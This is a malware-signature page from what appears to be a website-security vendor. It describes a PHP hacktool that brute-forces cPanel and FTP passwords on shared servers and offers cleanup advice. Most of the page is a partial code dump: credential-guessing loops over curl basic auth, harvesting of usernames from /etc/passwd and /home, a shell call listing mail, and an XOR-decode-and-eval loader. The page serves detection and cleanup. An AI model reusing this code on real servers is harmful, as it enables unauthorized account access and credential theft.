Malware Signatures

  1. Home
  2. Malware Signatures
  3. php.hacktool.cpanel_bruteforce.001

php.hacktool.cpanel_bruteforce.001

This script tries to guess CPanel and FTP passwords of all server users routingly trying every possible combination of characters (brute force attack). It attacks the same server that it works on so need to get access to at least one account on it first.
To get a list of server users, the script tries to read the /etc/passwd file. Alternatively, it grabs all subdirectory names under /home/.

Affecting

Any servers with enabled PHP

Cleanup

Delete the malicious script and scan your server for other types of malware and specifically for backdoors. Make sure that user accounts are properly isolated and system files have strict permission.
You can also sign up with us and let our team remove the malware for you.

Dump


$cpanel_port="2082";
$connect_timeout=5;
set_time_limit(0);
$submit=$_REQUEST['submit'];
$users=$_REQUEST['users'];
$pass=$_REQUEST['passwords'];
$target=$_REQUEST['target'];
$cracktype=$_REQUEST['cracktype'];
if($target == ""){
$target = "localhost";
}
$charset=$_REQUEST['charset'];
if($charset=="")
$charset="lowercase";
$max_length=$_REQUEST['max_length'];
if($max_length=="")
$max_length=10;
$min_length=$_REQUEST['min_length'];
if($min_length=="")
$min_length=1;

$charsetall = array("a", "b", "c",
...
for($huivamvsem=0;$huivamvsem<$lenth_of_crypted_code;$huivamvsem++)
$eval_php_code .= chr(ord($string_output[$huivamvsem]) ^ $key_that_script_is_crypted);
eval($eval_php_code);
...
function brute()
{
global $vals,$min_length,$max_length;
global $target,$pureuser,$connect_timeout;
$min=$min_length;
$max=$max_length;
$A = array();
$numVals = count($vals);
$incDone = "";
$realMax = "";
$currentVal = "";
$firstVal = "";
for ($i = 0; $i < ($max + 1); $i++) {
$A[$i] = -1;
}

for ($i = 0; $i < $max; $i++) {
$realMax = $realMax . $vals[$numVals - 1];
}
for ($i = 0; $i < $min; $i++) {
$A[$i] = $vals[0];
}
$i = 0;
while ($A[$i] != -1) {
$firstVal .= $A[$i];
$i++;
}
//echo $firstVal . "<br>";
cpanel_check($target,$pureuser,$firstVal,$connect_timeout);
...
function ftp_check($host,$user,$pass,$timeout)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "ftp://$host");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 28 )
{
print "<b><font face="Verdana" style="font-size: 9pt">
<font color="#AA0000">Error :</font> <font color="#008000">Connection Timeout
Please Check The Target Hostname .</font></font></b></p>";exit;
}
else if ( curl_errno($ch) == 0 )
{
print "<b><font face="Tahoma" style="font-size: 9pt" color="#008000">[~]</font></b><font face="Tahoma" style="font-size: 9pt"><b><font color="#008000">
Cracking Success With Username &quot;</font><font color="#FF0000">$user</font><font color="#008000">"
and Password "</font><font color="#FF0000">$pass</font><font color="#008000">"</font></b><br><br>";
}
curl_close($ch);
}
function cpanel_check($host,$user,$pass,$timeout)
{
global $cpanel_port;
$ch = curl_init();
//echo "http://$host:".$cpanel_port." $user $pass<br>";
curl_setopt($ch, CURLOPT_URL, "http://$host:" . $cpanel_port);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 28 )
{
print "<b><font face="Verdana" style="font-size: 9pt">
<font color="#AA0000">Error :</font> <font color="#008000">Connection Timeout
Please Check The Target Hostname .</font></font></b></p>";exit;
}
else if ( curl_errno($ch) == 0 )
{
print "<b><font face="Tahoma" style="font-size: 9pt" color="#008000">[~]</font></b><font face="Tahoma" style="font-size: 9pt"><b><font color="#008000">
Cracking Success With Username &quot;</font><font color="#FF0000">$user</font><font color="#008000">"
and Password "</font><font color="#FF0000">$pass</font><font color="#008000">"</font></b><br><br>";
}
curl_close($ch);
}
...
if($cracktype == "ftp")
{
foreach ($userlist as $user)
{
$pureuser = trim($user);
foreach ($passlist as $password )
{
$purepass = trim($password);
ftp_check($target,$pureuser,$purepass,$connect_timeout);
}
}
}

if ($cracktype == "cpanel" || $cracktype == "cpanel2")
{
...
if (isset($_GET['user']))
system('ls /var/mail');
if (isset($_POST['grab_users1'])) //grab users from /etc/passwd
{
$lines=file("/etc/passwd");
foreach($lines as $nr=>$val)
{
$str=explode(":",$val);
echo $str[0]."n";
}

}
if (isset($_POST['grab_users2']))
{
$dir = "/home/";
if ($dh = opendir($dir)) {
...